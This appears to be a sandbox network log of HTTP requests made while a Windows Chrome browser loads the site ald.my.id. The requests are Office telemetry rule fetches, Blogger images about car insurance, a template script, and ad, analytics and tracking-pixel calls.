Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxc-hwTYbS3a1TQOLU60Y3imqy1yV2Ra0mLvkxr0mtirFQzRdl8HUIFGwZeHbN-1ZYAFW0XPgAB4Joue2DmmjAJHamVEq0bhi80fVeW8ke7prIDNkNsCHk_8H_jfvg2VB1AGMJndzaxuFOSC_HidiCg3/s1600/motor%20insurance%20quote.jpg HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhTZef2smB-4WzKsOkrjN080E4YRXcWmVbIq6jcTxUMgr56k-eUFqy-Jm7D6EXXqB1WQfk-XifK51XMT1BsWcREtTRxd8-6dGx6m_nWYjXwYtdWuSM5xKwP0FgJhf4pxe8oEKqIizH5_bYtcQc3HUz44jaH9QX0JyjQKcO_NqOZwd1QZx9dzpk_d77Uaw/s300/Best%20Auto%20Insurance.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /igniel/blogger/master/iglo/v2.js HTTP/1.1Host: cdn.rawgit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4525035&@f16&@g1&@h1&@i1&@j1728897152149&@k0&@l1&@mCsh%20Verify&@n0&@ohttps%3A%2F%2Fald.my.id%2F&@q0&@r0&@s0&@ten-US&@u1280&@b1:105209297&@b3:1728897152&@b4:js15_as.js&@b5:-240&@a-_0.2.1&@vhttps%3A%2F%2Fald.my.id%2F&@w HTTP/1.1Host: s4.histats.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhTZef2smB-4WzKsOkrjN080E4YRXcWmVbIq6jcTxUMgr56k-eUFqy-Jm7D6EXXqB1WQfk-XifK51XMT1BsWcREtTRxd8-6dGx6m_nWYjXwYtdWuSM5xKwP0FgJhf4pxe8oEKqIizH5_bYtcQc3HUz44jaH9QX0JyjQKcO_NqOZwd1QZx9dzpk_d77Uaw/s300/Best%20Auto%20Insurance.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxc-hwTYbS3a1TQOLU60Y3imqy1yV2Ra0mLvkxr0mtirFQzRdl8HUIFGwZeHbN-1ZYAFW0XPgAB4Joue2DmmjAJHamVEq0bhi80fVeW8ke7prIDNkNsCHk_8H_jfvg2VB1AGMJndzaxuFOSC_HidiCg3/s1600/motor%20insurance%20quote.jpg HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4525035&@f16&@g1&@h1&@i1&@j1728897152149&@k0&@l1&@mCsh%20Verify&@n0&@ohttps%3A%2F%2Fald.my.id%2F&@q0&@r0&@s0&@ten-US&@u1280&@b1:105209297&@b3:1728897152&@b4:js15_as.js&@b5:-240&@a-_0.2.1&@vhttps%3A%2F%2Fald.my.id%2F&@w HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /gh/igniel/blogger@master/iglo/v2.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fald.my.id%2F&j=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: e.dtscout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /idg/?su=1040172889715587758A2B28B3F6BBD2 HTTP/1.1Host: t.dtscout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
Source: global trafficHTTP traffic detected: GET /pv/?_a=v&_h=ald.my.id&_ss=1dqyail9op&_pv=1&_ls=0&_u1=1&_u3=1&_cc=us&_pl=d&_cbid=6lao&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
Source: global trafficHTTP traffic detected: GET /pd/dtscout HTTP/1.1Host: pd.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/html/r20241009/r20190131/zrt_lookup_fy2021.html HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-2542884292174911&output=html&h=600&twa=1&slotname=3704632056&adk=3031347918&adf=2571581873&pi=t.ma~as.3704632056&w=243&abgtt=3&fwrn=4&fwrnh=100&lmt=1728897154&rafmt=1&armr=4&format=243x600&url=https%3A%2F%2Fald.my.id%2F&fwr=0&rs=1&rh=250&rw=243&rpe=1&resp_fmts=4&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152700&bpp=11&bdt=1788&idt=1670&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&correlator=2303771533125&frm=20&pv=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=1037&ady=6&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CaoeE%7C&abl=CA&pfx=0&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=1915 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=2199 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-2542884292174911&output=html&adk=1812271804&adf=3025194257&abgtt=3&lmt=1728897154&plaf=1%3A2%2C2%3A2%2C7%3A2&plat=1%3A128%2C2%3A128%2C3%3A128%2C4%3A128%2C8%3A128%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fald.my.id%2F&pra=7&wgl=1&aihb=0&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33&aifxl=29_18~30_19&aiixl=29_5~30_6&aslmct=0.7&asamct=0.7&aiict=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152747&bpp=5&bdt=1835&idt=2179&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600%2C300x250&nras=1&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&fsapi=1&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&fsb=1&dtd=2206 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b/p?id=wu!&lm=0&ts=1728897155274&dn=AFWU&iso=0&pu=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F&t=Csh%20Verify&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117 HTTP/1.1Host: ic.tynt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pd/dtscout?_t_=px&url=https%3A%2F%2Fald.my.id%2F&event_source=dtscout&rnd=0.9666548919402609&exptid=ZHoAA2cM4IQAAAAICdw7Aw%3D%3D&fcmp=false HTTP/1.1Host: pd.sharethis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
Source: global trafficHTTP traffic detected: GET /deb/v2?id=wu!&dn=AFWU&cc=1&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117&r=https%3A%2F%2Fald.my.id%2F&pu=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: de.tynt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /widget/?d=1040172889715587758A2B28B3F6BBD2&nid=300&p=2114454483&t=240&s=1280x1024x24&u=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F HTTP/1.1Host: t.dtscdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?partner=137085098&mapped=1040172889715587758A2B28B3F6BBD2 HTTP/1.1Host: pixel.onaudience.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
